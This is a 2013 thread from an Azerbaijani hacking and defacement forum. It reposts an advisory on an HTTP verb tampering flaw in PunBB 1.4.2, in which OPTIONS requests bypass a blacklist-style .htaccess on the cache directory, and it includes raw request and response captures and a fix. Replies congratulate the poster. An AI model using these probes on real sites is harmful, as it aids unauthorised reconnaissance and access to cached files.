Anti-armenia.ORG - Forumlar - PunBB 1.4.2 HTTP VERB Tampering



Istifadəçi
     2013-04-02 21:56 GMT                 

BlackMinD


Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Maraqlı və qəşəng vulnlardan biridir)

http://cxsecurity.com/issue/WLB-2013040005

Kod:
===============================================================
Vulnerable software: PunBB 1.4.2
Official site: http://punbb.informer.com/
Vuln: HTTP Verb Tampering.
Checked version: PunBB 1.4.2
===============================================================

About software:
===============================================================

PunBB is a fast and lightweight PHP-powered discussion board. It is released under the GNU General Public License.
Its primary goals are to be faster, smaller and less graphically intensive as compared to other discussion boards.
PunBB has fewer features than many other discussion boards, but is generally faster and outputs smaller,
semantically correct XHTML-compliant pages.

*Copy/paste from official wiki.*
===============================================================
About vuln:

punbb-1.4.2 is vulnerable to HTTP VERB Tampering because it tries restrict HTTP access to its own cache/ directory
using insecure manner.
I'm pretty sure we can call the following approach : "Black listing"
But as we all know black listing approach sucks as always.
Take a look:

==========/punbb-1.4.2/cache/.htaccess=====

<Limit GET POST PUT>
Order Allow,Deny
Deny from All
</Limit>
=====================================
Note: THIS file default shipped with latest 1.4.2 version.
Other versions may also affected but i didn't checked.

Using the following .htaccess file in its cache/ directory punbb denies HTTP GET,POST and PUT request(s) to the files
in cache directory.
But what about other HTTP method?
Here is few "fingerprinting" methods against real sites:(Notice status codes)

===============================================================
TEST 1: GET method

REQUEST METHOD: GET
URL: http://examplesite/punbb/cache/index.html
Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive


Server Returns:

HTTP/1.1 403 Forbidden
Date: Tue, 02 Apr 2013 00:26:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 224
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /punbb/cache/index.html
on this server.</p>
</body></html>
===============================================================

TEST 2
REQUEST METHOD: POST
URL: http://examplesite/punbb/cache/index.html

Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 42


$_POST data to send:

&id=this is a test for HTTP VERB tampering



Server Returns:

HTTP/1.1 403 Forbidden
Date: Tue, 02 Apr 2013 00:28:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 224
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /punbb/cache/index.html
on this server.</p>
</body></html>



===============================================================

TEST 3: Fun begins.
Request method: OPTIONS
URL: http://examplesite/punbb/cache/index.html

Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 0


Server returns:
HTTP/1.1 200 OK <===========Notice
Date: Tue, 02 Apr 2013 00:32:09 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html



======================================

TEST 4: Notice again status code: 404
Method: OPTIONS
URL: http://examplesite/punbb/cache/not_existense_filename_checking_notice_status_code.php


Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 0



Server returns:

HTTP/1.1 404 Not Found
Date: Tue, 02 Apr 2013 00:36:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 264
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /punbb/cache/not_existense_filename_checking_notice_status_code.php was not found on this
server.</p>
</body></html>


======================================


Using the following way(s) attacker may in ex:
Access cache files.In itself this issuse may open new attacks/or give more chances for attacker.

Do not use black listing approach instead of use whilelisting.
So don't use Limit directive in your .htaccess file.
In this case instead of simple *deny from all* will do it's own job.(If i'm wrong please correct me)



=========================================
KUDOSSSSSSS
=========================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
http://exploit-db.com/

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE

*Super special KUDOS to my bro Brendan Coles!
Love you and Respect you dude!
Thank you!*
===========================================

/AkaStep

Ana VƏTƏN!
Anti-armenia.ORG
     
 

Istifadəçi
     2013-04-03 06:34 GMT                 

Ferid23


Admin
Mesaj Sayı : 1875
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Anti-armenia.ORG
Ölkə :
Məslək : Programmer & Defacer
Yaş : 12
Mesaj :

Mövzunu Paylaş!


Təbriklər

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)
Anti-armenia.ORG
     
 

Istifadəçi
     2013-04-03 15:49 GMT                 

M4NY3T!K


Gold
Mesaj Sayı : 606
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   7  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Naxçıvan
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Təbriklər Bro

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
     
 

 
Site By: Ferid23 | Designed: MCH & FERID23  | Site: Anti-armenia.ORG